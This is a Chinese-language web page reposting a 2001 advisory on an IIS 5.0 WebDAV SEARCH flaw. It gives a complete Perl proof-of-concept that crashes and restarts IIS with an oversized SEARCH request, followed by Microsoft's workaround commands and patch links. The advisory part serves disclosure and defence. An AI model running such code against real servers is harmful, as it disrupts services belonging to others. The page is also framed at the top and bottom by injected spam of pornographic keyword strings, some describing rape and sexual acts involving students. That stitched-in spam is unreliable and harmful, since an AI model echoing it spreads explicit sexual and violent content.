久久精品精选,精品九九视频,www久久只有这里有精品,亚洲熟女乱色综合一区
    分享

    IIS 5.0 SEARCH 方法遠程攻擊漏洞

     老莊走狗 2006-06-09
    發布日期:2001-03-20
    更新日期:2001-03-20

    受影響系統:

    Microsoft IIS 5.0
       + Microsoft Windows NT 2000
    描述:

    WebDAV是HTTP協議的擴展,允許從遠程來編寫和管理Web內容。微軟IIS 5.0的WebDAV在
    處理某些畸形的請求時存在缺陷,當提交一個超長的SEARCH請求時可以使IIS 服務重啟。

    <* 來源: Georgi Guninski (guninski@GUNINSKI.COM
              http://www.
    *>


    測試方法:

    警 告

    以下程序(方法)可能帶有攻擊性,僅供安全研究與教學之用。使用者風險自負!


    Georgi Guninski (guninski@GUNINSKI.COM)提供了如下測試代碼:
    --vv6.pl-------------------------------------------------------------
    #!/usr/bin/perl
    use IO::Socket;
    printf "IIS 5.0 SEARCH\nWritten by Georgi Guninski wait some time\n";
    if(@ARGV < 2) { die "\nUsage: IIS5host port \n"; }
    $port = @ARGV[1];
    $host = @ARGV[0];
    sub vv()
    {
    $ll=$_[0]; #length of buffer
    $ch=$_[1];
    $socket = IO::Socket::INET->new(PeerAddr => $host,PeerPort => $port,Proto => "TCP") || return;
    $over=$ch x $ll; #string to overflow
    $xml=‘<?xml version="1.0"?><D:searchrequest xmlns:D="DAV:"><D:sql>SELECT DAV:displayname from SCOPE("‘.$over.‘")</D:sql></D:searchrequest>‘."\n";
    $l=length($xml);
    $req="SEARCH / HTTP/1.1\nContent-type: text/xml\nHost: $host\nContent-length: $l\n\n$xml\n\n";
    syswrite($socket,$req,length($req));
    print ".";
    $socket->read($res,3000);
    print "r=".$res;
    close $socket;
    }
    do  vv(126000,"V");
    sleep(1);
    do  vv(126000,"V");
    #Try 125000 - 128000
    ---------------------------------------------------------------



    建議:

    臨時解決方法:

    微軟給出一個禁止WebDAV的臨時解決辦法(http://www.microsoft.com/technet/support/kb.asp?ID=241520):
    1、先停止IIS服務。可以在命令行下敲“IISRESET /STOP”命令。
    2、禁止everyone訪問Httpext.dll:
    CACLS %SystemRoot%\System32\Inetsrv\httpext.dll /D Everyone
    3、再啟動IIS服務:IISRESET /START

    廠商補丁:

    微軟已經為此發布了一個安全公告(MS-016):
    http://www.microsoft.com/technet/security/bulletin/MS01-016.asp

    補丁程序(目前只有英文版):

    Microsoft IIS 5.0:
    http://www.microsoft.com/Downloads/Release.asp?ReleaseID=28564

      本站是提供個人知識管理的網絡存儲空間,所有內容均由用戶發布,不代表本站觀點。請注意甄別內容中的聯系方式、誘導購買等信息,謹防詐騙。如發現有害或侵權內容,請點擊一鍵舉報。
      轉藏 分享 獻花(0

      0條評論

      發表

      請遵守用戶 評論公約

      類似文章 更多

      主站蜘蛛池模板: 天天做天天爱夜夜爽导航 | 无码人妻久久一区二区三区免费丨| 亚洲另类精品无码专区| 性一交一乱一伦| 欧美成人一卡二卡三卡四卡| 精品国产亚洲一区二区三区| 99久久亚洲综合精品成人网| 人妻少妇偷人无码视频| 美女内射毛片在线看免费人动物| 少妇无套内谢免费视频| 久久精品国产亚洲AV麻豆长发| 国产精品天天看天天狠| 午夜不卡欧美AAAAAA在线观看| 亚洲高清无在码在线电影不卡| 亚洲理论在线A中文字幕| 国产AV人人夜夜澡人人爽| 无码免费大香伊蕉在人线国产| 亚洲中文字幕无码专区| 亚洲欧美综合人成在线| 亚洲AV成人噜噜无码网站| 国产精品午夜精品福利| 亚洲中文字幕久久精品无码A| 国产乱妇乱子在线视频| 成人3D动漫一区二区三区 | 亚洲欧美高清在线精品一区二区| 丰满的少妇被猛烈进入白浆| 久久久久99精品国产片| 精品视频在线观看免费观看| 欧美性受XXXX黑人XYX性爽| 国产成人精彩在线视频| gogo无码大胆啪啪艺术| 亚洲国产成人久久综合三区| 美女被强奷到抽搐的动态图| 同桌上课脱裙子让我帮他自慰 | 欧美性猛交xxxx乱大交丰满| 国产一区二区在线影院| 精品视频不卡免费观看| 日韩日韩日韩日韩日韩| 亚洲国产成人AⅤ毛片奶水| 国产成人午夜福利院| 色屁屁WWW免费看欧美激情|